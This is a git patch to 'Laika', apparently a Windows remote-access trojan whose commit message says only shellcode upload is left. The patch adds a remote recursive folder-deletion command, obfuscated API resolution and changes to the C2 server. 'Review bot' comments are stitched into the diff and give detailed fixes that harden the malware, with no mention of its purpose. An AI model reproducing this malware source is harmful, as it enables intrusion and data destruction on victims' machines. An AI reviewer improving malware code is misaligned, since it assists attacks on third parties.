From 72b476101148d4d64dd597a8d6e2de7c08b3b710 Mon Sep 17 00:00:00 2001
From: ALittlePatate
Date: Tue, 21 Feb 2023 19:01:37 +0100
Subject: [PATCH] delete_folder marche manque plus que l'upload de shellcode et on est bon !
---
 Laika/file_explorer.c | 55 +++++++++++++++++++++++++++++++++++++++++++
 Laika/file_explorer.h | 1 +
 Laika/main.c | 5 +++-
 Laika/resolve_apis.c | 3 +++
 Laika/resolve_apis.h | 4 ++++
 Server/Server.py | 4 ++--
 6 files changed, 69 insertions(+), 3 deletions(-)
diff --git a/Laika/file_explorer.c b/Laika/file_explorer.c
index 3a183eb..563fc51 100644
--- a/Laika/file_explorer.c
+++ b/Laika/file_explorer.c
@@ -88,6 +88,61 @@ char* get_file_list(const char* dirPath, int* numFiles) {
 return fileNames;
 }
+BOOL delete_folder(LPCTSTR lpszDir) {
+ WIN32_FIND_DATA FindFileData;
+ HANDLE hFind;
+ TCHAR szDir[MAX_PATH];
+ TCHAR szFileName[MAX_PATH];
+
+ // copy the directory path to a buffer
+ lstrcpy(szDir, lpszDir);
+
+ // add the wildcard character and search for the first file in the directory
+ lstrcat(szDir, TEXT("\\*"));
+ hFind = Api.FindFirstFileW(szDir, &FindFileData);
+
+ if (hFind == INVALID_HANDLE_VALUE) {
+ // unable to find the first file
+ return FALSE;
+ }
+
+ do {
+ if (lstrcmp(FindFileData.cFileName, TEXT(".")) == 0 || lstrcmp(FindFileData.cFileName, TEXT("..")) == 0) {
+ // skip the current and parent directories
+ continue;
+ }
+
+ // build the full file name
+ lstrcpy(szFileName, lpszDir);
+ lstrcat(szFileName, TEXT("\\"));
+ lstrcat(szFileName, FindFileData.cFileName);
+
+ if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
+ // recursively delete the subdirectory
+ if (!delete_folder(szFileName)) {
+ Api.FindClose(hFind);
+ return FALSE;
+ }
+ }
+ else {
+ // delete the file
+ if (Api.DeleteFileW(szFileName) == FALSE) {
+ Api.FindClose(hFind);
+ return FALSE;
+ }
+ }
+ } while (Api.FindNextFileW(hFind, &FindFileData));
+
+ // close the search handle
+ Api.FindClose(hFind);
+
+ // remove the directory
+ if (Api.RemoveDirectoryW(lpszDir) == FALSE) {
+ return FALSE;
+ }
+
+ return TRUE;
+}
 int download_file(FILE* fp, SOCKET sock) {
 char* data = (char*)Api.malloc(BUFFER_SIZE);
diff --git a/Laika/file_explorer.h b/Laika/file_explorer.h
index b6a5494..aeb4b6f 100644
--- a/Laika/file_explorer.h
+++ b/Laika/file_explorer.h
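Review bot: `szDir` and `szFileName` in delete_folder are fixed `MAX_PATH` buffers filled with `lstrcpy`/`lstrcat` and no length check, so a long `lpszDir` or a long entry name met during the recursion writes past the end of a stack buffer. Check the combined length before each copy and fail closed, e.g. `if (lstrlen(lpszDir) + lstrlen(FindFileData.cFileName) + 2 > MAX_PATH) { Api.FindClose(hFind); return FALSE; }` in the loop, and the same test with `lstrlen(lpszDir) + 3 > MAX_PATH` before `szDir` is built. The function also mixes `TCHAR`/`LPCTSTR`/`WIN32_FIND_DATA` with the explicitly wide `FindFirstFileW`/`DeleteFileW`/`RemoveDirectoryW` pointers, which only type-checks in a UNICODE build; `WCHAR`, `LPCWSTR` and `WIN32_FIND_DATAW` would match the typedefs in resolve_apis.h. Separately, the directory branch recurses into anything carrying `FILE_ATTRIBUTE_DIRECTORY`, which includes junctions and directory symlinks, so the delete can leave the requested tree; testing `FILE_ATTRIBUTE_REPARSE_POINT` and removing the link itself instead of descending would contain it.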
@@ -16,6 +16,7 @@ extern API Api;
 int get_object_info(char* path, struct stat* fileinfo);
 int get_drives_list(char* buf);
+BOOL delete_folder(LPCTSTR lpszDir);
 char* get_file_list(const char* dirPath, int* numFiles);
 int download_file(FILE* fp, SOCKET sock);
 void upload_file(SOCKET sock, const char* path);
\ No newline at end of file
diff --git a/Laika/main.c b/Laika/main.c
index 4928890..9aa0bb0 100644
--- a/Laika/main.c
+++ b/Laika/main.c
@@ -211,8 +211,11 @@ retry:
 goto retry;
 }
- Api.rmdir(CAESAR_DECRYPT(path));
+ LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path));
+ delete_folder(wstr);
+
+ Api.free((LPWSTR)wstr);
 Api.free(path);
 }
diff --git a/Laika/resolve_apis.c b/Laika/resolve_apis.c
index 36dd479..3fa7534 100644
--- a/Laika/resolve_apis.c
+++ b/Laika/resolve_apis.c
@@ -31,11 +31,14 @@ void InitApis() {
 Api.MultiByteToWideChar = (TMultiByteToWideChar)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("RzqynG~yjYt\\nijHmfw"));
 Api.FindFirstFileW = (TFindFirstFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiKnwxyKnqj\\"));
 Api.FindNextFileW = (TFindNextFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiSj}yKnqj\\"));
+ Api.RemoveDirectoryW = (TRemoveDirectoryW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Wjrt{jInwjhytw~\\"));
+ Api.DeleteFileW = (TDeleteFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("IjqjyjKnqj\\"));
 hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
 if (!hMsvcrt) {
 return;
 }
+ Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~"));
 Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth"));
 Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj"));
diff --git a/Laika/resolve_apis.h b/Laika/resolve_apis.h
index 0f3f6d8..f7b645e 100644
--- a/Laika/resolve_apis.h
+++ b/Laika/resolve_apis.h
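Review bot: `wstr` is handed to `delete_folder` without a NULL check, and the BOOL that `delete_folder` returns is dropped, so a failed conversion or a partial delete looks the same as success at this call site in main.c. Guard the call and keep the result, e.g. `if (wstr != NULL && !delete_folder(wstr)) { /* surface the failure */ }`. `ConvertCharToWChar` is not visible in this patch, so whether it can return NULL, and whether its buffer is one that `Api.free` may release, should be confirmed. Declaring the variable as `LPWSTR` would also remove the cast in `Api.free((LPWSTR)wstr)`. The enclosing block starts and ends outside the hunk.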
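Review bot: `Api.strcpy` is resolved in InitApis but nothing in this patch calls it (delete_folder uses `lstrcpy`/`lstrcat` directly), and neither resolve_apis.h hunk adds a `strcpy` member or a `Tstrcpy` typedef. Unless both already exist outside the visible hunks, the line `Api.strcpy = (Tstrcpy)Api.GetProcAddress(...)` does not compile; either drop it from this commit or add the declarations alongside it. The two new kernel32 pointers are also stored without checking the `GetProcAddress` result, so a failed lookup is only discovered when delete_folder calls through a NULL pointer. InitApis continues outside the hunk.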
@@ -57,6 +57,8 @@ typedef DWORD(WINAPI* TGetLogicalDrives)(VOID);
 typedef int(WINAPI* TMultiByteToWideChar)(UINT, DWORD, LPCCH, int, LPWSTR, int);
 typedef HANDLE(WINAPI* TFindFirstFileW)(LPCWSTR, LPWIN32_FIND_DATAW);
 typedef BOOL(WINAPI* TFindNextFileW)(HANDLE, LPWIN32_FIND_DATAW);
+typedef BOOL(WINAPI* TRemoveDirectoryW)(LPCWSTR);
+typedef BOOL(WINAPI* TDeleteFileW)(LPCWSTR);
 typedef struct ApiList {
 Tconnect connect;
@@ -95,6 +97,8 @@ typedef struct ApiList {
 TMultiByteToWideChar MultiByteToWideChar;
 TFindFirstFileW FindFirstFileW;
 TFindNextFileW FindNextFileW;
+ TRemoveDirectoryW RemoveDirectoryW;
+ TDeleteFileW DeleteFileW;
 Tmbstowcs mbstowcs;
 Twcstombs wcstombs;
diff --git a/Server/Server.py b/Server/Server.py
index f9f09fb..def48d7 100644
--- a/Server/Server.py
+++ b/Server/Server.py
@@ -145,8 +145,8 @@ def upload_file(fp, sock):
 app = Flask(__name__)
 # Disable Flask's default logging
-log = logging.getLogger('werkzeug')
-log.disabled = True
+#log = logging.getLogger('werkzeug')
+#log.disabled = True
 @app.route('/')
 def serve_file(filename):
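Review bot: The comment `# Disable Flask's default logging` in Server.py now sits above two commented-out lines, so it describes behaviour the file no longer has and werkzeug request logging is back on. If logging is meant to stay enabled, delete the dead lines and the comment. If this was a temporary debugging change, it should not be part of this commit; a single switch such as `logging.getLogger('werkzeug').disabled = not DEBUG` (with `DEBUG` defined once near the top) would make the intent explicit.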